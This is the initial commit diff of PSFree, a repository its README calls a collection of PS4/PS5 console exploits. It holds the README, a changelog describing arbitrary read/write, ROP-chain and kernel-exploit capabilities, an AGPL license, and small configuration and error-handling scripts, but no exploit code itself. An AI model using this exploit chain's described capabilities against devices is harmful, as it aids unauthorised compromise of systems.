commit b9f5957555d4ae3c9ef47fa9e830212500c3db49
Author: Al Azif <33132478+Al-Azif@users.noreply.github.com>
Date: Mon May 12 14:30:43 2025 -0700
Initial commit
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..a1ab8d0
--- /dev/null
+++ b/README.md
@@ -0,0 +1,20 @@
+# PSFree version 1.5.0
+
+PSFree is a collection of exploits for the PS4 console. The main focus of the
+repo is for the PS4 but we try to make things portable to PS5.
+
+* Exploits
+ * PSFree: src/psfree.mjs
+ * Lapse (kernel): src/scripts/lapse.mjs
+
+Donation (Monero/XMR):
+86Fk3X9AE94EGKidzRbvyiVgGNYD3qZnuKNq1ZbsomFWXHYm6TtAgz9GNGitPWadkS3Wr9uXoT29U1SfdMtJ7QNKQpW1CVS
+
+# COPYRIGHT AND AUTHORS:
+AGPL-3.0-or-later (see src/COPYING). This repo belongs to the group
+`anonymous`. We refer to anonymous contributors as "anonymous" as well.
+
+# CREDITS:
+* anonymous for PS4 firmware kernel dumps
+* Check the appropriate files for any **extra** contributors. Unless otherwise
+ stated, everything here can also be credited to us.
diff --git a/changelog.txt b/changelog.txt
new file mode 100644
index 0000000..30e48d1
--- /dev/null
+++ b/changelog.txt
@@ -0,0 +1,27 @@
+* 1.5.0:
+ * add Lapse kernel exploit
+ * rewrite PSFree exploit
+
+* 1.4.0:
+ * add kernel patch payload for 8.0x
+
+fixes:
+ * remove the risk of crashing from using the Chain classes
+ * remove the risk of crashing from using make_buffer()
+ * (PS5 < 3.00) use valid config at exploit.mjs:setup_ssv_data
+
+* 1.3.0:
+ * improve the speed and reliability of the exploit (exploit.mjs)
+ * add ROP chain managers for 8.5x, 9.0x, 9.5x
+ * drop support for webkitgtk 2.34.4, see 1.0.0 for a working implementation
+
+* 1.2.0:
+ * add support for PS4 6.00-6.20
+
+* 1.1.0:
+ * add support for running ROP chains (PS4 8.03)
+ * add support for calling syscalls (PS4 8.03)
+
+* 1.0.0:
+ * add proof-of-concept code to gain arbitrary read/write
+ (PS4 6.50-9.60/PS5 1.00-5.50)
diff --git a/fw_series_convention.txt b/fw_series_convention.txt
new file mode 100644
index 0000000..0c6e17f
--- /dev/null
+++ b/fw_series_convention.txt
@@ -0,0 +1,16 @@
+PS4/PS5 Firmware Series Convention
+
+Convention used by this repo to refer to a set of firmwares.
+
+The pattern X.Yx means X.Y0 <= firmware < (X + 1).V0. Y is either 0 or 5. V is
+5 if Y is 0, 0 if Y is 5.
+
+examples:
+* 6.0x refer to 6.00 <= fw < 6.50.
+* 6.5x refer to 6.50 <= fw < 7.00.
+
+The pattern X.xx means X.00 <= firmware < (X + 1).00.
+
+examples:
+* 6.xx refer to 6.00 <= fw < 7.00.
+* 7.xx refer to 7.00 <= fw < 8.00.
diff --git a/src/COPYING b/src/COPYING
new file mode 100644
index 0000000..be3f7b2
--- /dev/null
+++ b/src/COPYING
@@ -0,0 +1,661 @@
+ GNU AFFERO GENERAL PUBLIC LICENSE
+ Version 3, 19 November 2007
+
+ Copyright (C) 2007 Free Software Foundation, Inc.
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+ Preamble
+
+ The GNU Affero General Public License is a free, copyleft license for
+software and other kinds of works, specifically designed to ensure
+cooperation with the community in the case of network server software.
+
+ The licenses for most software and other practical works are designed
+to take away your freedom to share and change the works. By contrast,
+our General Public Licenses are intended to guarantee your freedom to
+share and change all versions of a program--to make sure it remains free
+software for all its users.
+
+ When we speak of free software, we are referring to freedom, not
+price. Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+them if you wish), that you receive source code or can get it if you
+want it, that you can change the software or use pieces of it in new
+free programs, and that you know you can do these things.
+
+ Developers that use our General Public Licenses protect your rights
+with two steps: (1) assert copyright on the software, and (2) offer
+you this License which gives you legal permission to copy, distribute
+and/or modify the software.
+
+ A secondary benefit of defending all users' freedom is that
+improvements made in alternate versions of the program, if they
+receive widespread use, become available for other developers to
+incorporate. Many developers of free software are heartened and
+encouraged by the resulting cooperation. However, in the case of
+software used on network servers, this result may fail to come about.
+The GNU General Public License permits making a modified version and
+letting the public access it on a server without ever releasing its
+source code to the public.
+
+ The GNU Affero General Public License is designed specifically to
+ensure that, in such cases, the modified source code becomes available
+to the community. It requires the operator of a network server to
+provide the source code of the modified version running there to the
+users of that server. Therefore, public use of a modified version, on
+a publicly accessible server, gives the public access to the source
+code of the modified version.
+
+ An older license, called the Affero General Public License and
+published by Affero, was designed to accomplish similar goals. This is
+a different license, not a version of the Affero GPL, but Affero has
+released a new version of the Affero GPL which permits relicensing under
+this license.
+
+ The precise terms and conditions for copying, distribution and
+modification follow.
+
+ TERMS AND CONDITIONS
+
+ 0. Definitions.
+
+ "This License" refers to version 3 of the GNU Affero General Public License.
+
+ "Copyright" also means copyright-like laws that apply to other kinds of
+works, such as semiconductor masks.
+
+ "The Program" refers to any copyrightable work licensed under this
+License. Each licensee is addressed as "you". "Licensees" and
+"recipients" may be individuals or organizations.
+
+ To "modify" a work means to copy from or adapt all or part of the work
+in a fashion requiring copyright permission, other than the making of an
+exact copy. The resulting work is called a "modified version" of the
+earlier work or a work "based on" the earlier work.
+
+ A "covered work" means either the unmodified Program or a work based
+on the Program.
+
+ To "propagate" a work means to do anything with it that, without
+permission, would make you directly or secondarily liable for
+infringement under applicable copyright law, except executing it on a
+computer or modifying a private copy. Propagation includes copying,
+distribution (with or without modification), making available to the
+public, and in some countries other activities as well.
+
+ To "convey" a work means any kind of propagation that enables other
+parties to make or receive copies. Mere interaction with a user through
+a computer network, with no transfer of a copy, is not conveying.
+
+ An interactive user interface displays "Appropriate Legal Notices"
+to the extent that it includes a convenient and prominently visible
+feature that (1) displays an appropriate copyright notice, and (2)
+tells the user that there is no warranty for the work (except to the
+extent that warranties are provided), that licensees may convey the
+work under this License, and how to view a copy of this License. If
+the interface presents a list of user commands or options, such as a
+menu, a prominent item in the list meets this criterion.
+
+ 1. Source Code.
+
+ The "source code" for a work means the preferred form of the work
+for making modifications to it. "Object code" means any non-source
+form of a work.
+
+ A "Standard Interface" means an interface that either is an official
+standard defined by a recognized standards body, or, in the case of
+interfaces specified for a particular programming language, one that
+is widely used among developers working in that language.
+
+ The "System Libraries" of an executable work include anything, other
+than the work as a whole, that (a) is included in the normal form of
+packaging a Major Component, but which is not part of that Major
+Component, and (b) serves only to enable use of the work with that
+Major Component, or to implement a Standard Interface for which an
+implementation is available to the public in source code form. A
+"Major Component", in this context, means a major essential component
+(kernel, window system, and so on) of the specific operating system
+(if any) on which the executable work runs, or a compiler used to
+produce the work, or an object code interpreter used to run it.
+
+ The "Corresponding Source" for a work in object code form means all
+the source code needed to generate, install, and (for an executable
+work) run the object code and to modify the work, including scripts to
+control those activities. However, it does not include the work's
+System Libraries, or general-purpose tools or generally available free
+programs which are used unmodified in performing those activities but
+which are not part of the work. For example, Corresponding Source
+includes interface definition files associated with source files for
+the work, and the source code for shared libraries and dynamically
+linked subprograms that the work is specifically designed to require,
+such as by intimate data communication or control flow between those
+subprograms and other parts of the work.
+
+ The Corresponding Source need not include anything that users
+can regenerate automatically from other parts of the Corresponding
+Source.
+
+ The Corresponding Source for a work in source code form is that
+same work.
+
+ 2. Basic Permissions.
+
+ All rights granted under this License are granted for the term of
+copyright on the Program, and are irrevocable provided the stated
+conditions are met. This License explicitly affirms your unlimited
+permission to run the unmodified Program. The output from running a
+covered work is covered by this License only if the output, given its
+content, constitutes a covered work. This License acknowledges your
+rights of fair use or other equivalent, as provided by copyright law.
+
+ You may make, run and propagate covered works that you do not
+convey, without conditions so long as your license otherwise remains
+in force. You may convey covered works to others for the sole purpose
+of having them make modifications exclusively for you, or provide you
+with facilities for running those works, provided that you comply with
+the terms of this License in conveying all material for which you do
+not control copyright. Those thus making or running the covered works
+for you must do so exclusively on your behalf, under your direction
+and control, on terms that prohibit them from making any copies of
+your copyrighted material outside their relationship with you.
+
+ Conveying under any other circumstances is permitted solely under
+the conditions stated below. Sublicensing is not allowed; section 10
+makes it unnecessary.
+
+ 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
+
+ No covered work shall be deemed part of an effective technological
+measure under any applicable law fulfilling obligations under article
+11 of the WIPO copyright treaty adopted on 20 December 1996, or
+similar laws prohibiting or restricting circumvention of such
+measures.
+
+ When you convey a covered work, you waive any legal power to forbid
+circumvention of technological measures to the extent such circumvention
+is effected by exercising rights under this License with respect to
+the covered work, and you disclaim any intention to limit operation or
+modification of the work as a means of enforcing, against the work's
+users, your or third parties' legal rights to forbid circumvention of
+technological measures.
+
+ 4. Conveying Verbatim Copies.
+
+ You may convey verbatim copies of the Program's source code as you
+receive it, in any medium, provided that you conspicuously and
+appropriately publish on each copy an appropriate copyright notice;
+keep intact all notices stating that this License and any
+non-permissive terms added in accord with section 7 apply to the code;
+keep intact all notices of the absence of any warranty; and give all
+recipients a copy of this License along with the Program.
+
+ You may charge any price or no price for each copy that you convey,
+and you may offer support or warranty protection for a fee.
+
+ 5. Conveying Modified Source Versions.
+
+ You may convey a work based on the Program, or the modifications to
+produce it from the Program, in the form of source code under the
+terms of section 4, provided that you also meet all of these conditions:
+
+ a) The work must carry prominent notices stating that you modified
+ it, and giving a relevant date.
+
+ b) The work must carry prominent notices stating that it is
+ released under this License and any conditions added under section
+ 7. This requirement modifies the requirement in section 4 to
+ "keep intact all notices".
+
+ c) You must license the entire work, as a whole, under this
+ License to anyone who comes into possession of a copy. This
+ License will therefore apply, along with any applicable section 7
+ additional terms, to the whole of the work, and all its parts,
+ regardless of how they are packaged. This License gives no
+ permission to license the work in any other way, but it does not
+ invalidate such permission if you have separately received it.
+
+ d) If the work has interactive user interfaces, each must display
+ Appropriate Legal Notices; however, if the Program has interactive
+ interfaces that do not display Appropriate Legal Notices, your
+ work need not make them do so.
+
+ A compilation of a covered work with other separate and independent
+works, which are not by their nature extensions of the covered work,
+and which are not combined with it such as to form a larger program,
+in or on a volume of a storage or distribution medium, is called an
+"aggregate" if the compilation and its resulting copyright are not
+used to limit the access or legal rights of the compilation's users
+beyond what the individual works permit. Inclusion of a covered work
+in an aggregate does not cause this License to apply to the other
+parts of the aggregate.
+
+ 6. Conveying Non-Source Forms.
+
+ You may convey a covered work in object code form under the terms
+of sections 4 and 5, provided that you also convey the
+machine-readable Corresponding Source under the terms of this License,
+in one of these ways:
+
+ a) Convey the object code in, or embodied in, a physical product
+ (including a physical distribution medium), accompanied by the
+ Corresponding Source fixed on a durable physical medium
+ customarily used for software interchange.
+
+ b) Convey the object code in, or embodied in, a physical product
+ (including a physical distribution medium), accompanied by a
+ written offer, valid for at least three years and valid for as
+ long as you offer spare parts or customer support for that product
+ model, to give anyone who possesses the object code either (1) a
+ copy of the Corresponding Source for all the software in the
+ product that is covered by this License, on a durable physical
+ medium customarily used for software interchange, for a price no
+ more than your reasonable cost of physically performing this
+ conveying of source, or (2) access to copy the
+ Corresponding Source from a network server at no charge.
+
+ c) Convey individual copies of the object code with a copy of the
+ written offer to provide the Corresponding Source. This
+ alternative is allowed only occasionally and noncommercially, and
+ only if you received the object code with such an offer, in accord
+ with subsection 6b.
+
+ d) Convey the object code by offering access from a designated
+ place (gratis or for a charge), and offer equivalent access to the
+ Corresponding Source in the same way through the same place at no
+ further charge. You need not require recipients to copy the
+ Corresponding Source along with the object code. If the place to
+ copy the object code is a network server, the Corresponding Source
+ may be on a different server (operated by you or a third party)
+ that supports equivalent copying facilities, provided you maintain
+ clear directions next to the object code saying where to find the
+ Corresponding Source. Regardless of what server hosts the
+ Corresponding Source, you remain obligated to ensure that it is
+ available for as long as needed to satisfy these requirements.
+
+ e) Convey the object code using peer-to-peer transmission, provided
+ you inform other peers where the object code and Corresponding
+ Source of the work are being offered to the general public at no
+ charge under subsection 6d.
+
+ A separable portion of the object code, whose source code is excluded
+from the Corresponding Source as a System Library, need not be
+included in conveying the object code work.
+
+ A "User Product" is either (1) a "consumer product", which means any
+tangible personal property which is normally used for personal, family,
+or household purposes, or (2) anything designed or sold for incorporation
+into a dwelling. In determining whether a product is a consumer product,
+doubtful cases shall be resolved in favor of coverage. For a particular
+product received by a particular user, "normally used" refers to a
+typical or common use of that class of product, regardless of the status
+of the particular user or of the way in which the particular user
+actually uses, or expects or is expected to use, the product. A product
+is a consumer product regardless of whether the product has substantial
+commercial, industrial or non-consumer uses, unless such uses represent
+the only significant mode of use of the product.
+
+ "Installation Information" for a User Product means any methods,
+procedures, authorization keys, or other information required to install
+and execute modified versions of a covered work in that User Product from
+a modified version of its Corresponding Source. The information must
+suffice to ensure that the continued functioning of the modified object
+code is in no case prevented or interfered with solely because
+modification has been made.
+
+ If you convey an object code work under this section in, or with, or
+specifically for use in, a User Product, and the conveying occurs as
+part of a transaction in which the right of possession and use of the
+User Product is transferred to the recipient in perpetuity or for a
+fixed term (regardless of how the transaction is characterized), the
+Corresponding Source conveyed under this section must be accompanied
+by the Installation Information. But this requirement does not apply
+if neither you nor any third party retains the ability to install
+modified object code on the User Product (for example, the work has
+been installed in ROM).
+
+ The requirement to provide Installation Information does not include a
+requirement to continue to provide support service, warranty, or updates
+for a work that has been modified or installed by the recipient, or for
+the User Product in which it has been modified or installed. Access to a
+network may be denied when the modification itself materially and
+adversely affects the operation of the network or violates the rules and
+protocols for communication across the network.
+
+ Corresponding Source conveyed, and Installation Information provided,
+in accord with this section must be in a format that is publicly
+documented (and with an implementation available to the public in
+source code form), and must require no special password or key for
+unpacking, reading or copying.
+
+ 7. Additional Terms.
+
+ "Additional permissions" are terms that supplement the terms of this
+License by making exceptions from one or more of its conditions.
+Additional permissions that are applicable to the entire Program shall
+be treated as though they were included in this License, to the extent
+that they are valid under applicable law. If additional permissions
+apply only to part of the Program, that part may be used separately
+under those permissions, but the entire Program remains governed by
+this License without regard to the additional permissions.
+
+ When you convey a copy of a covered work, you may at your option
+remove any additional permissions from that copy, or from any part of
+it. (Additional permissions may be written to require their own
+removal in certain cases when you modify the work.) You may place
+additional permissions on material, added by you to a covered work,
+for which you have or can give appropriate copyright permission.
+
+ Notwithstanding any other provision of this License, for material you
+add to a covered work, you may (if authorized by the copyright holders of
+that material) supplement the terms of this License with terms:
+
+ a) Disclaiming warranty or limiting liability differently from the
+ terms of sections 15 and 16 of this License; or
+
+ b) Requiring preservation of specified reasonable legal notices or
+ author attributions in that material or in the Appropriate Legal
+ Notices displayed by works containing it; or
+
+ c) Prohibiting misrepresentation of the origin of that material, or
+ requiring that modified versions of such material be marked in
+ reasonable ways as different from the original version; or
+
+ d) Limiting the use for publicity purposes of names of licensors or
+ authors of the material; or
+
+ e) Declining to grant rights under trademark law for use of some
+ trade names, trademarks, or service marks; or
+
+ f) Requiring indemnification of licensors and authors of that
+ material by anyone who conveys the material (or modified versions of
+ it) with contractual assumptions of liability to the recipient, for
+ any liability that these contractual assumptions directly impose on
+ those licensors and authors.
+
+ All other non-permissive additional terms are considered "further
+restrictions" within the meaning of section 10. If the Program as you
+received it, or any part of it, contains a notice stating that it is
+governed by this License along with a term that is a further
+restriction, you may remove that term. If a license document contains
+a further restriction but permits relicensing or conveying under this
+License, you may add to a covered work material governed by the terms
+of that license document, provided that the further restriction does
+not survive such relicensing or conveying.
+
+ If you add terms to a covered work in accord with this section, you
+must place, in the relevant source files, a statement of the
+additional terms that apply to those files, or a notice indicating
+where to find the applicable terms.
+
+ Additional terms, permissive or non-permissive, may be stated in the
+form of a separately written license, or stated as exceptions;
+the above requirements apply either way.
+
+ 8. Termination.
+
+ You may not propagate or modify a covered work except as expressly
+provided under this License. Any attempt otherwise to propagate or
+modify it is void, and will automatically terminate your rights under
+this License (including any patent licenses granted under the third
+paragraph of section 11).
+
+ However, if you cease all violation of this License, then your
+license from a particular copyright holder is reinstated (a)
+provisionally, unless and until the copyright holder explicitly and
+finally terminates your license, and (b) permanently, if the copyright
+holder fails to notify you of the violation by some reasonable means
+prior to 60 days after the cessation.
+
+ Moreover, your license from a particular copyright holder is
+reinstated permanently if the copyright holder notifies you of the
+violation by some reasonable means, this is the first time you have
+received notice of violation of this License (for any work) from that
+copyright holder, and you cure the violation prior to 30 days after
+your receipt of the notice.
+
+ Termination of your rights under this section does not terminate the
+licenses of parties who have received copies or rights from you under
+this License. If your rights have been terminated and not permanently
+reinstated, you do not qualify to receive new licenses for the same
+material under section 10.
+
+ 9. Acceptance Not Required for Having Copies.
+
+ You are not required to accept this License in order to receive or
+run a copy of the Program. Ancillary propagation of a covered work
+occurring solely as a consequence of using peer-to-peer transmission
+to receive a copy likewise does not require acceptance. However,
+nothing other than this License grants you permission to propagate or
+modify any covered work. These actions infringe copyright if you do
+not accept this License. Therefore, by modifying or propagating a
+covered work, you indicate your acceptance of this License to do so.
+
+ 10. Automatic Licensing of Downstream Recipients.
+
+ Each time you convey a covered work, the recipient automatically
+receives a license from the original licensors, to run, modify and
+propagate that work, subject to this License. You are not responsible
+for enforcing compliance by third parties with this License.
+
+ An "entity transaction" is a transaction transferring control of an
+organization, or substantially all assets of one, or subdividing an
+organization, or merging organizations. If propagation of a covered
+work results from an entity transaction, each party to that
+transaction who receives a copy of the work also receives whatever
+licenses to the work the party's predecessor in interest had or could
+give under the previous paragraph, plus a right to possession of the
+Corresponding Source of the work from the predecessor in interest, if
+the predecessor has it or can get it with reasonable efforts.
+
+ You may not impose any further restrictions on the exercise of the
+rights granted or affirmed under this License. For example, you may
+not impose a license fee, royalty, or other charge for exercise of
+rights granted under this License, and you may not initiate litigation
+(including a cross-claim or counterclaim in a lawsuit) alleging that
+any patent claim is infringed by making, using, selling, offering for
+sale, or importing the Program or any portion of it.
+
+ 11. Patents.
+
+ A "contributor" is a copyright holder who authorizes use under this
+License of the Program or a work on which the Program is based. The
+work thus licensed is called the contributor's "contributor version".
+
+ A contributor's "essential patent claims" are all patent claims
+owned or controlled by the contributor, whether already acquired or
+hereafter acquired, that would be infringed by some manner, permitted
+by this License, of making, using, or selling its contributor version,
+but do not include claims that would be infringed only as a
+consequence of further modification of the contributor version. For
+purposes of this definition, "control" includes the right to grant
+patent sublicenses in a manner consistent with the requirements of
+this License.
+
+ Each contributor grants you a non-exclusive, worldwide, royalty-free
+patent license under the contributor's essential patent claims, to
+make, use, sell, offer for sale, import and otherwise run, modify and
+propagate the contents of its contributor version.
+
+ In the following three paragraphs, a "patent license" is any express
+agreement or commitment, however denominated, not to enforce a patent
+(such as an express permission to practice a patent or covenant not to
+sue for patent infringement). To "grant" such a patent license to a
+party means to make such an agreement or commitment not to enforce a
+patent against the party.
+
+ If you convey a covered work, knowingly relying on a patent license,
+and the Corresponding Source of the work is not available for anyone
+to copy, free of charge and under the terms of this License, through a
+publicly available network server or other readily accessible means,
+then you must either (1) cause the Corresponding Source to be so
+available, or (2) arrange to deprive yourself of the benefit of the
+patent license for this particular work, or (3) arrange, in a manner
+consistent with the requirements of this License, to extend the patent
+license to downstream recipients. "Knowingly relying" means you have
+actual knowledge that, but for the patent license, your conveying the
+covered work in a country, or your recipient's use of the covered work
+in a country, would infringe one or more identifiable patents in that
+country that you have reason to believe are valid.
+
+ If, pursuant to or in connection with a single transaction or
+arrangement, you convey, or propagate by procuring conveyance of, a
+covered work, and grant a patent license to some of the parties
+receiving the covered work authorizing them to use, propagate, modify
+or convey a specific copy of the covered work, then the patent license
+you grant is automatically extended to all recipients of the covered
+work and works based on it.
+
+ A patent license is "discriminatory" if it does not include within
+the scope of its coverage, prohibits the exercise of, or is
+conditioned on the non-exercise of one or more of the rights that are
+specifically granted under this License. You may not convey a covered
+work if you are a party to an arrangement with a third party that is
+in the business of distributing software, under which you make payment
+to the third party based on the extent of your activity of conveying
+the work, and under which the third party grants, to any of the
+parties who would receive the covered work from you, a discriminatory
+patent license (a) in connection with copies of the covered work
+conveyed by you (or copies made from those copies), or (b) primarily
+for and in connection with specific products or compilations that
+contain the covered work, unless you entered into that arrangement,
+or that patent license was granted, prior to 28 March 2007.
+
+ Nothing in this License shall be construed as excluding or limiting
+any implied license or other defenses to infringement that may
+otherwise be available to you under applicable patent law.
+
+ 12. No Surrender of Others' Freedom.
+
+ If conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License. If you cannot convey a
+covered work so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you may
+not convey it at all. For example, if you agree to terms that obligate you
+to collect a royalty for further conveying from those to whom you convey
+the Program, the only way you could satisfy both those terms and this
+License would be to refrain entirely from conveying the Program.
+
+ 13. Remote Network Interaction; Use with the GNU General Public License.
+
+ Notwithstanding any other provision of this License, if you modify the
+Program, your modified version must prominently offer all users
+interacting with it remotely through a computer network (if your version
+supports such interaction) an opportunity to receive the Corresponding
+Source of your version by providing access to the Corresponding Source
+from a network server at no charge, through some standard or customary
+means of facilitating copying of software. This Corresponding Source
+shall include the Corresponding Source for any work covered by version 3
+of the GNU General Public License that is incorporated pursuant to the
+following paragraph.
+
+ Notwithstanding any other provision of this License, you have
+permission to link or combine any covered work with a work licensed
+under version 3 of the GNU General Public License into a single
+combined work, and to convey the resulting work. The terms of this
+License will continue to apply to the part which is the covered work,
+but the work with which it is combined will remain governed by version
+3 of the GNU General Public License.
+
+ 14. Revised Versions of this License.
+
+ The Free Software Foundation may publish revised and/or new versions of
+the GNU Affero General Public License from time to time. Such new versions
+will be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+ Each version is given a distinguishing version number. If the
+Program specifies that a certain numbered version of the GNU Affero General
+Public License "or any later version" applies to it, you have the
+option of following the terms and conditions either of that numbered
+version or of any later version published by the Free Software
+Foundation. If the Program does not specify a version number of the
+GNU Affero General Public License, you may choose any version ever published
+by the Free Software Foundation.
+
+ If the Program specifies that a proxy can decide which future
+versions of the GNU Affero General Public License can be used, that proxy's
+public statement of acceptance of a version permanently authorizes you
+to choose that version for the Program.
+
+ Later license versions may give you additional or different
+permissions. However, no additional obligations are imposed on any
+author or copyright holder as a result of your choosing to follow a
+later version.
+
+ 15. Disclaimer of Warranty.
+
+ THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
+APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
+HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
+OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
+THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
+IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
+ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
+
+ 16. Limitation of Liability.
+
+ IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
+THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
+GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
+USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
+DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
+PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
+EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
+SUCH DAMAGES.
+
+ 17. Interpretation of Sections 15 and 16.
+
+ If the disclaimer of warranty and limitation of liability provided
+above cannot be given local legal effect according to their terms,
+reviewing courts shall apply local law that most closely approximates
+an absolute waiver of all civil liability in connection with the
+Program, unless a warranty or assumption of liability accompanies a
+copy of the Program in return for a fee.
+
+ END OF TERMS AND CONDITIONS
+
+ How to Apply These Terms to Your New Programs
+
+ If you develop a new program, and you want it to be of the greatest
+possible use to the public, the best way to achieve this is to make it
+free software which everyone can redistribute and change under these terms.
+
+ To do so, attach the following notices to the program. It is safest
+to attach them to the start of each source file to most effectively
+state the exclusion of warranty; and each file should have at least
+the "copyright" line and a pointer to where the full notice is found.
+
+
+ Copyright (C)
+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU Affero General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU Affero General Public License for more details.
+
+ You should have received a copy of the GNU Affero General Public License
+ along with this program. If not, see .
+
+Also add information on how to contact you by electronic and paper mail.
+
+ If your software can interact with users remotely through a computer
+network, you should also make sure that it provides a way for users to
+get its source. For example, if your program is a web application, its
+interface could display a "Source" link that leads users to an archive
+of the code. There are many ways you could offer source, and different
+solutions will be better for different programs; see section 13 for the
+specific requirements.
+
+ You should also get your employer (if you work as a programmer) or school,
+if any, to sign a "copyright disclaimer" for the program, if necessary.
+For more information on this, and how to apply and follow the GNU AGPL, see
+.
diff --git a/src/about.html b/src/about.html
new file mode 100644
index 0000000..2fc6be3
--- /dev/null
+++ b/src/about.html
@@ -0,0 +1,116 @@
+
+
+
+
+ About PSFree
+
+
+ PSFree is an exploit chain for PS4 and PS5.
+ PSFree is free software. See COPYING for the copyleft information.
+ PSFree's license is GNU-AGPL-3.0-or-later.
+ Here is the source code of this program:
+
+ HTML files:
+ index.html
+ about.html
+ JavaScript files:
+
+ kpatch/ files:
+ kpatch/utils.h
+ kpatch/script.ld
+ kpatch/Makefile
+ kpatch/80x.c
+ kpatch/types.h
+ fonts/ files:
+ fonts/README.txt
+ fonts/FONTS.LICENSE
+ fonts/LiberationMono-Regular.ttf
+
+
diff --git a/src/alert.mjs b/src/alert.mjs
new file mode 100644
index 0000000..b5a7371
--- /dev/null
+++ b/src/alert.mjs
@@ -0,0 +1,52 @@
+/* Copyright (C) 2023-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+// We can't just open a console on the ps4 browser, make sure the errors thrown
+// by our program are alerted.
+
+// We don't use a custom logging function to avoid a dependency on a logging
+// module since we want this file to stand alone. We don't want to copy the
+// log function here either for the sake avoiding dependencies since using
+// alert() is good enough.
+
+// We log the line and column numbers as well since some exceptions (like
+// SyntaxError) do not show it in the stack trace.
+
+addEventListener('unhandledrejection', event => {
+ const reason = event.reason;
+ alert(
+ 'Unhandled rejection\n'
+ + `${reason}\n`
+ + `${reason.sourceURL}:${reason.line}:${reason.column}\n`
+ + `${reason.stack}`
+ );
+});
+
+addEventListener('error', event => {
+ const reason = event.error;
+ alert(
+ 'Unhandled error\n'
+ + `${reason}\n`
+ + `${reason.sourceURL}:${reason.line}:${reason.column}\n`
+ + `${reason.stack}`
+ );
+ return true;
+});
+
+// we have to dynamically import the program if we want to catch its syntax
+// errors
+import('./psfree.mjs');
diff --git a/src/config.mjs b/src/config.mjs
new file mode 100644
index 0000000..4141ead
--- /dev/null
+++ b/src/config.mjs
@@ -0,0 +1,70 @@
+/* Copyright (C) 2023-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+// webkitgtk 2.34.4 was used to develop the portable parts of the exploit
+// before moving on to ps4 8.03
+//
+// webkitgtk 2.34.4 was built with cmake variable ENABLE_JIT=OFF, that variable
+// can affect the size of SerializedScriptValue
+//
+// this target is no longer supported
+
+// target firmware format used by PSFree
+//
+// 0xC_MM_mm
+//
+// * C console - PS4 (0) or PS5 (1) (1 bit)
+// * MM major version - integer part of the firmware version (8 bits)
+// * mm minor version - fractional part of the firmware version (8 bits)
+//
+// examples:
+// * PS4 10.00 -> C = 0 MM = 10 mm = 0 -> 0x0_10_00
+// * PS5 4.51 -> C = 1 MM = 4 mm = 51 -> 0x1_04_51
+
+// check if value is in Binary Coded Decimal format
+// assumes integer and is in the range [0, 0xffff]
+function check_bcd(value) {
+ for (let i = 0; i <= 12; i += 4) {
+ const nibble = (value >>> i) & 0xf;
+
+ if (nibble > 9) {
+ return false;
+ }
+ }
+
+ return true;
+}
+
+export function set_target(value) {
+ if (!Number.isInteger(value)) {
+ throw TypeError(`value not an integer: ${value}`);
+ }
+
+ if (value >= 0x20000 || value < 0) {
+ throw RangeError(`value >= 0x20000 or value < 0: ${value}`);
+ }
+
+ const version = value & 0xffff;
+ if (!check_bcd(version)) {
+ throw RangeError(`value & 0xffff not in BCD format ${version}`);
+ }
+
+ target = value;
+}
+
+export let target = null;
+set_target(0x800);
diff --git a/src/fonts/FONTS.LICENSE b/src/fonts/FONTS.LICENSE
new file mode 100644
index 0000000..94475dd
--- /dev/null
+++ b/src/fonts/FONTS.LICENSE
@@ -0,0 +1,101 @@
+Digitized data copyright (c) 2010 Google Corporation
